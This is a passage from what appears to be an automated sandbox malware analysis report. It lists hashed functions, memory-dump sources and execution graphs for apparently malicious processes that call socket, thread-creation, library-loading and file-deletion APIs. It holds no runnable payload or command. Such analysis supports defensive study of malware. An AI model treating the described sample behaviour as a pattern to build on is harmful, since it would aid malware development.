                                                                                                                                • Instruction Fuzzy Hash: D2E09271B006244B9708FBAEA8404AAF6DBEFC8514318C17FD40DCB766ED7099428784
                                                                                                                                Function 06C1B480 Relevance: .0, Instructions: 29COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 16f28f02e08438c8732fe69e1788416a43980d089ad748748422fcc26ab0d853
                                                                                                                                • Instruction ID: c1351371572a8bc6901d32c0f02680591cbdca8ecb2f16da8744d77bf0d4ef7d
                                                                                                                                • Opcode Fuzzy Hash: 16f28f02e08438c8732fe69e1788416a43980d089ad748748422fcc26ab0d853
                                                                                                                                • Instruction Fuzzy Hash: 5DF0DAB0D0430A9FDB54DFADD841AAEBBF4EB48300F1085A9D918E7301D7749A40CF90
                                                                                                                                Function 06C1B511 Relevance: .0, Instructions: 29COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1fa08dd5d23e549e9f02ec84c2d1e1d38c6d80f0be22c92330f1006012ef37ce
                                                                                                                                • Instruction ID: c66c001f2a001953ab7c76c923a628e2f10563c4ce718c418e7b97bb6e98b9c0
                                                                                                                                • Opcode Fuzzy Hash: 1fa08dd5d23e549e9f02ec84c2d1e1d38c6d80f0be22c92330f1006012ef37ce
                                                                                                                                • Instruction Fuzzy Hash: 27F05EB8D06348EFD741DFA8E4449ADBFB5EB49301F0081A9D88897351C3309E50DF91
                                                                                                                                Function 06C1B479 Relevance: .0, Instructions: 27COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dae56d2889fdd4326e4bb6fe83a5b34e4da56fe4e2e6a0a726c8457b96fe2537
                                                                                                                                • Instruction ID: 5ff6933b039d2b42b06290b1d0ded3f76711ff0cf0802df4323ab3cee16c36d7
                                                                                                                                • Opcode Fuzzy Hash: dae56d2889fdd4326e4bb6fe83a5b34e4da56fe4e2e6a0a726c8457b96fe2537
                                                                                                                                • Instruction Fuzzy Hash: 6FF0D4B4E0420AAFDB44DFA9D455AAEBFF4BB48300F1484A9D514EB302D7748A41CF90
                                                                                                                                Function 06C1A94F Relevance: .0, Instructions: 27COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b090f404b1d05e670f681976240c782344bd92f58810487e912d6d7ec14813a1
                                                                                                                                • Instruction ID: a74af1a60d2a9938d892d0d09d8ad57c4ebe4426ca184dd25904ee37fb09837f
                                                                                                                                • Opcode Fuzzy Hash: b090f404b1d05e670f681976240c782344bd92f58810487e912d6d7ec14813a1
                                                                                                                                • Instruction Fuzzy Hash: 4EF0DA74A09248CFD740CFE0C954AADBBB5AF4A301F219059E406AF366C6359D06CB40
                                                                                                                                Function 06C12627 Relevance: .0, Instructions: 26COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e2a58bd1ca1bcb728dc28fadcbe2830d54004ca3155c2e14ef169d4f202248f6
                                                                                                                                • Instruction ID: b1fdca7ed31aaa77f5d6db77a704fca592df59ac06504833be6212f47974f6f4
                                                                                                                                • Opcode Fuzzy Hash: e2a58bd1ca1bcb728dc28fadcbe2830d54004ca3155c2e14ef169d4f202248f6
                                                                                                                                • Instruction Fuzzy Hash: 55E020316057140F87145B3698405E67BB7EEC5100304C2DED44AC7A16D5705D05C7D1
                                                                                                                                Function 06C1BD04 Relevance: .0, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 35e6d89fc6fec3bd250d4642fdec78eb0fd6b262bd01061203cb38f9741d858b
                                                                                                                                • Instruction ID: 638403544838ed6cf32be44e36d27042c39e1939126f82de020df6e8d5971087
                                                                                                                                • Opcode Fuzzy Hash: 35e6d89fc6fec3bd250d4642fdec78eb0fd6b262bd01061203cb38f9741d858b
                                                                                                                                • Instruction Fuzzy Hash: 45F0A974A05228CFDB64CF64D980B98BBB2BB1A301F1041DAE849AB341CB749E81CF50
                                                                                                                                Function 06C1B520 Relevance: .0, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 305ba644e5d32795f909a3f068770176cf75a4ba8b9371a920d27bc54333b999
                                                                                                                                • Instruction ID: 70865b0fb759c45d8aa71a6c8c2bcbaef64cce8e8bd9f5a8ad0f9c6194407983
                                                                                                                                • Opcode Fuzzy Hash: 305ba644e5d32795f909a3f068770176cf75a4ba8b9371a920d27bc54333b999
                                                                                                                                • Instruction Fuzzy Hash: 24F0AEB4D0530CEFDB44DFA8E544AADBBB6EB49301F1081A9D848A7310D7359A50EF81
                                                                                                                                Function 06C12820 Relevance: .0, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: acf541f8b4185bc1bc113e2c3b6ba618f9c0f6b9cc4e667d3c3cc3dc11617762
                                                                                                                                • Instruction ID: 4bcb169055887747cdd56b44691ea8af3db2e27bce57270c51f43eeabc356a6b
                                                                                                                                • Opcode Fuzzy Hash: acf541f8b4185bc1bc113e2c3b6ba618f9c0f6b9cc4e667d3c3cc3dc11617762
                                                                                                                                • Instruction Fuzzy Hash: 18E0C23B70095503596A310DE84896D228ACBC6625308442FD199CBB50CE2D8E828299
                                                                                                                                Function 06C1B41F Relevance: .0, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6dd1362f473bebb74e82f3e3361e1accfb05214cbb4ff6244bd40afba05cd3be
                                                                                                                                • Instruction ID: 294404661c158a9c2f2e8101b421bff64d670d11f4cd1ae4e57ee5dce8f307ab
                                                                                                                                • Opcode Fuzzy Hash: 6dd1362f473bebb74e82f3e3361e1accfb05214cbb4ff6244bd40afba05cd3be
                                                                                                                                • Instruction Fuzzy Hash: BEE01AB4D0020AEFD780EFB9D555A9EBFF0BF09200F10C4A5D018EB222E7708A029F91
                                                                                                                                Function 06C1A4A6 Relevance: .0, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9f304d35b18da1d489fa201ee37a4c1b62212d2638a990cb8f642d5d87c9d107
                                                                                                                                • Instruction ID: d576c6db003a4b9dcead11b9ac7398347c81709dddfe7ab65015b15a003f01b8
                                                                                                                                • Opcode Fuzzy Hash: 9f304d35b18da1d489fa201ee37a4c1b62212d2638a990cb8f642d5d87c9d107
                                                                                                                                • Instruction Fuzzy Hash: ACE01235A4B209CFDB50DB94E8507EC7736EB8722AF1029A5D50DDA101D6305A909A42
                                                                                                                                Function 06C10500 Relevance: .0, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 70b02022f10ba1506b6d3be599156c0018eaedf8b2d4a18270f67b2acac37aeb
                                                                                                                                • Instruction ID: cc09593515e32895a4188ce16360096ca62af76b3881a03f133e4ef3518a48c0
                                                                                                                                • Opcode Fuzzy Hash: 70b02022f10ba1506b6d3be599156c0018eaedf8b2d4a18270f67b2acac37aeb
                                                                                                                                • Instruction Fuzzy Hash: EFD02B362053857FD7029798AC00CC27FBF9B8A65070880D7F448CB123C222A876C7F6
                                                                                                                                Function 06C1BFDF Relevance: .0, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 770166127c07488a713486c982cb9c34ffdcc181ea7ef7a91df599a45c2bae99
                                                                                                                                • Instruction ID: 011de5d9bb34f2bc32b85c89d819038f4c57a94c10b657836afacc68ccb7bc3f
                                                                                                                                • Opcode Fuzzy Hash: 770166127c07488a713486c982cb9c34ffdcc181ea7ef7a91df599a45c2bae99
                                                                                                                                • Instruction Fuzzy Hash: 62E01239649218CFD754CB95E5449A8B37AFF4F312F1050EAE90A9B261CB31DD50DF60
                                                                                                                                Function 06C1B428 Relevance: .0, Instructions: 18COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 39d26e61304e718ff8026773cf0390539752a684efe1c578fd85aac2e86fd1be
                                                                                                                                • Instruction ID: 5a6844a31dc6bec2b273464a1ca92cde80ea65084d763320533d3b39f9473a33
                                                                                                                                • Opcode Fuzzy Hash: 39d26e61304e718ff8026773cf0390539752a684efe1c578fd85aac2e86fd1be
                                                                                                                                • Instruction Fuzzy Hash: BAE0B6B0D4020AEFD780EFB9C945A5EBBF0BF08700F11C5A9D019EB221E7749A058F91
                                                                                                                                Function 06C1FE58 Relevance: .0, Instructions: 17COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d8b21c184014f46bc72587bee200d5fc6958fa5d8fc5b8be38f407a3fffe535a
                                                                                                                                • Instruction ID: b86ea95cbf0449c83e61281b440cb8698faf6d0cfa6bb94d01af0f5ee3fa4cd3
                                                                                                                                • Opcode Fuzzy Hash: d8b21c184014f46bc72587bee200d5fc6958fa5d8fc5b8be38f407a3fffe535a
                                                                                                                                • Instruction Fuzzy Hash: 47E0C27490130CDBCB00EFA8E50639CBBB5DB85302F0001ADD90457380CB710F40E782
                                                                                                                                Function 06C17DA1 Relevance: .0, Instructions: 17COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d194c3a20b87119885a6b18b44a7d7e705362ca59bf4d583271bc7bd49b88c19
                                                                                                                                • Instruction ID: 7b0fea084eb44f6ef83bcbe77516019996e040566b4aecfcf748191ecdde5a6c
                                                                                                                                • Opcode Fuzzy Hash: d194c3a20b87119885a6b18b44a7d7e705362ca59bf4d583271bc7bd49b88c19
                                                                                                                                • Instruction Fuzzy Hash: EBD0A750A0C14CDFDB59177984546B03F59BB9711075841ADC1858A089DD119843DB33
                                                                                                                                Function 06C1B5A1 Relevance: .0, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 126dfae33c8523998c85dbd515e1f345c7ca03337d006e2f40e8401700126228
                                                                                                                                • Instruction ID: 09cea9368fc2e5436d70bbf95a646e14342d8c492916bc0c34c7d4a0415361e8
                                                                                                                                • Opcode Fuzzy Hash: 126dfae33c8523998c85dbd515e1f345c7ca03337d006e2f40e8401700126228
                                                                                                                                • Instruction Fuzzy Hash: 91D0127964A248CFD701CFA4E85486AB737FB87302B1051D6DC095B212C7339D24EF85
                                                                                                                                Function 06C1A119 Relevance: .0, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0a0a399a7adb30ef729523e6ba889815112d59d65faf057d992770ec5cd4d56d
                                                                                                                                • Instruction ID: 7117f1f327d10b9d6b9d253460efa35e750daef1bb193afcf5ea83582100d2cc
                                                                                                                                • Opcode Fuzzy Hash: 0a0a399a7adb30ef729523e6ba889815112d59d65faf057d992770ec5cd4d56d
                                                                                                                                • Instruction Fuzzy Hash: B6D05230A0A20ECFCB10DB98E8407ECBB36FB85225F0022A5C20CA6201C7301A908E82
                                                                                                                                Function 06C19F2B Relevance: .0, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1d61c03d3453f8a96860c7a4f4265f98b494dab353156d0a7ac87df2db267f01
                                                                                                                                • Instruction ID: e8762250fb76ac8a3ab54ae12c92b6301b364b672d6f1e82a2a7c7a0ccbdb8a7
                                                                                                                                • Opcode Fuzzy Hash: 1d61c03d3453f8a96860c7a4f4265f98b494dab353156d0a7ac87df2db267f01
                                                                                                                                • Instruction Fuzzy Hash: C8C08075143708D7E3101770F91F7E5376F5745101F001154FA4D415114F704454DAF7
                                                                                                                                Function 06C10510 Relevance: .0, Instructions: 13COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: baadd200ffd5f04f57049bda00ea8262959b365368d400cd1b9102f69285ea2c
                                                                                                                                • Instruction ID: 233ece5ba66788118d82e51060e0599c7b6b26e868471892cd67dbcda7462042
                                                                                                                                • Opcode Fuzzy Hash: baadd200ffd5f04f57049bda00ea8262959b365368d400cd1b9102f69285ea2c
                                                                                                                                • Instruction Fuzzy Hash: 89C012372001187F4A01AB85D900CC6BBADAF49654304C056F5088B125D622E56397D4
                                                                                                                                Function 06C19F30 Relevance: .0, Instructions: 10COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1df6d5fbe1b3301d8b32dbece89d156c57f456537a434683dbfb441424ec6a0a
                                                                                                                                • Instruction ID: 854c025152f95861384ab3bce50a146e144a9be390f0142b80c14704b75663e6
                                                                                                                                • Opcode Fuzzy Hash: 1df6d5fbe1b3301d8b32dbece89d156c57f456537a434683dbfb441424ec6a0a
                                                                                                                                • Instruction Fuzzy Hash: 7BC02BB000230CCBF3102BA0F60E33437BAA705202F000154EB0D419218BB04840D7E7
                                                                                                                                Function 06C1509C Relevance: .0, Instructions: 8COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b3698bbbab013bfc7375ce7ed7d43790da6835734de2aab8885bc01221d762fa
                                                                                                                                • Instruction ID: c4ed5c85a506d1e6c205b361e261ad89119884bab4d419482ff5213916098407
                                                                                                                                • Opcode Fuzzy Hash: b3698bbbab013bfc7375ce7ed7d43790da6835734de2aab8885bc01221d762fa
                                                                                                                                • Instruction Fuzzy Hash: C1B012A91E5251E772806AA5CD50A3F6810FFF3708B419C67339414240CC608825F25B
                                                                                                                                Function 06C150A0 Relevance: .0, Instructions: 7COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 28f8f1ad53709c3f84fb9fcb0eb6b08e9f92a6c11b70aaa50c77c4abb40b99a1
                                                                                                                                • Instruction ID: fd511f1f5b26665e8fb78ca7a8018fcf1ef7cc7638324fbf775b2143017d7062
                                                                                                                                • Opcode Fuzzy Hash: 28f8f1ad53709c3f84fb9fcb0eb6b08e9f92a6c11b70aaa50c77c4abb40b99a1
                                                                                                                                • Instruction Fuzzy Hash: 91B012AD054241E973806AE18C41A2D6B21FFF3700B418467B36404150CC600066B267

                                                                                                                                Non-executed Functions

                                                                                                                                Function 010B6EC1 Relevance: .1, Instructions: 69COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6174cce8f18c879cbcaa11832ad0b3659ed5976e6df7b1cf7fbdecc1f7b44c91
                                                                                                                                • Instruction ID: 753914f3b3e1b2bdf2099c231864e2925a4f0e422ec82849b12a11ce55218127
                                                                                                                                • Opcode Fuzzy Hash: 6174cce8f18c879cbcaa11832ad0b3659ed5976e6df7b1cf7fbdecc1f7b44c91
                                                                                                                                • Instruction Fuzzy Hash: 27215EB1C083898FDB11CFAAC8447DEBFF0AF4A224F14859ED495AB252D3756905CF61

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:25.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:3
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 31 73da6e7 32 73da6ee socket 31->32 34 73da79e 32->34

                                                                                                                                Callgraph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                • Opacity -> Relevance
                                                                                                                                • Disassembly available
                                                                                                                                callgraph 0 Function_073DA51E 1 Function_073FF826 2 Function_073DA6E7 2->0 3 Function_073FF805 4 Function_073FF773

                                                                                                                                Executed Functions

                                                                                                                                Function 073DA6E7 Relevance: 1.6, APIs: 1, Instructions: 121networkCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 73da6e7-73da6ed 1 73da6ee-73da6fc 0->1 2 73da6fd 1->2 3 73da725-73da729 1->3 2->3 4 73da6ff-73da723 2->4 5 73da77f-73da782 3->5 6 73da72b-73da746 3->6 4->1 8 73da785-73da789 5->8 7 73da751-73da757 6->7 7->5 9 73da759-73da77d 7->9 8->8 10 73da78b-73da798 socket 8->10 9->7 12 73da79e-73da7a5 10->12 13 73da835-73da842 10->13 14 73da7b0-73da7b6 12->14 15 73da7de-73da7e2 14->15 16 73da7b8-73da7dc 14->16 18 73da824-73da832 call 73da51e 15->18 19 73da7e4-73da7eb 15->19 16->14 18->13 20 73da7f6-73da7fc 19->20 20->18 22 73da7fe-73da822 20->22 22->20
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.4587208123.0000000007370000.00000040.80000000.00040000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_7370000_IEFVDUdSaLLhw.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: socket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 98920635-0
                                                                                                                                • Opcode ID: 9062912267aaa5036353cdc5aa087de866e5d9df055dcdab7c6e1ccba327a24a
                                                                                                                                • Instruction ID: d6557c4f732c9edbe690f91f44212b638ad4d87cfdb4a4b1c401c502a6f587c8
                                                                                                                                • Opcode Fuzzy Hash: 9062912267aaa5036353cdc5aa087de866e5d9df055dcdab7c6e1ccba327a24a
                                                                                                                                • Instruction Fuzzy Hash: 065159B1E14158DFDB09CF98D590AACBBF6BF49314F188099E81AA7391C7346E42CF50

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:2.6%
                                                                                                                                Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                Signature Coverage:1.5%
                                                                                                                                Total number of Nodes:455
                                                                                                                                Total number of Limit Nodes:72
                                                                                                                                execution_graph 100786 7c813d GetFileAttributesW 100787 7c8153 100786->100787 100452 3572ad0 LdrInitializeThunk 100453 7c1ff0 100458 7d87d0 100453->100458 100457 7c203b 100459 7d87ea 100458->100459 100467 3572c0a 100459->100467 100460 7c2026 100462 7d91e0 100460->100462 100463 7d926f 100462->100463 100464 7d920b 100462->100464 100470 3572e80 LdrInitializeThunk 100463->100470 100464->100457 100465 7d929d 100465->100457 100468 3572c11 100467->100468 100469 3572c1f LdrInitializeThunk 100467->100469 100468->100460 100469->100460 100470->100465 100788 7c99b0 100789 7db2c0 RtlAllocateHeap 100788->100789 100791 7c99be 100789->100791 100790 7c99e6 100791->100790 100792 7db1e0 RtlFreeHeap 100791->100792 100792->100790 100793 7d90b0 100794 7d912a 100793->100794 100796 7d90de 100793->100796 100795 7d913d NtDeleteFile 100794->100795 100471 7c2464 100472 7c24cb 100471->100472 100474 7c246b 100471->100474 100476 7c24f3 100472->100476 100477 7c6050 100472->100477 100484 7c42c0 100474->100484 100478 7c6083 100477->100478 100479 7c60a7 100478->100479 100488 7d8cd0 100478->100488 100479->100476 100481 7c60ca 100481->100479 100492 7d9150 100481->100492 100483 7c614a 100483->100476 100485 7c42e4 100484->100485 100486 7c42eb 100485->100486 100487 7c4320 LdrLoadDll 100485->100487 100486->100472 100487->100486 100489 7d8cea 100488->100489 100495 3572ca0 LdrInitializeThunk 100489->100495 100490 7d8d13 100490->100481 100493 7d916d 100492->100493 100494 7d917b NtClose 100493->100494 100494->100483 100495->100490 100496 7d1864 100497 7d186f 100496->100497 100498 7d9150 NtClose 100497->100498 100500 7d1874 100497->100500 100499 7d1899 100498->100499 100501 7b9b60 100502 7b9b6f 100501->100502 100503 7b9bb0 100502->100503 100504 7b9b9d CreateThread 100502->100504 100505 7c70e0 100506 7c70f8 100505->100506 100508 7c7152 100505->100508 100506->100508 100509 7cb030 100506->100509 100510 7cb056 100509->100510 100511 7cb283 100510->100511 100536 7d9520 100510->100536 100511->100508 100513 7cb0cc 100513->100511 100539 7dc4d0 100513->100539 100515 7cb0eb 100515->100511 100516 7cb1bf 100515->100516 100517 7d87d0 LdrInitializeThunk 100515->100517 100518 7cb1db 100516->100518 100519 7c58c0 LdrInitializeThunk 100516->100519 100520 7cb14d 100517->100520 100524 7cb26b 100518->100524 100552 7d8340 100518->100552 100519->100518 100520->100516 100521 7cb156 100520->100521 100521->100511 100522 7cb1a7 100521->100522 100523 7cb185 100521->100523 100545 7c58c0 100521->100545 100548 7c7eb0 100522->100548 100567 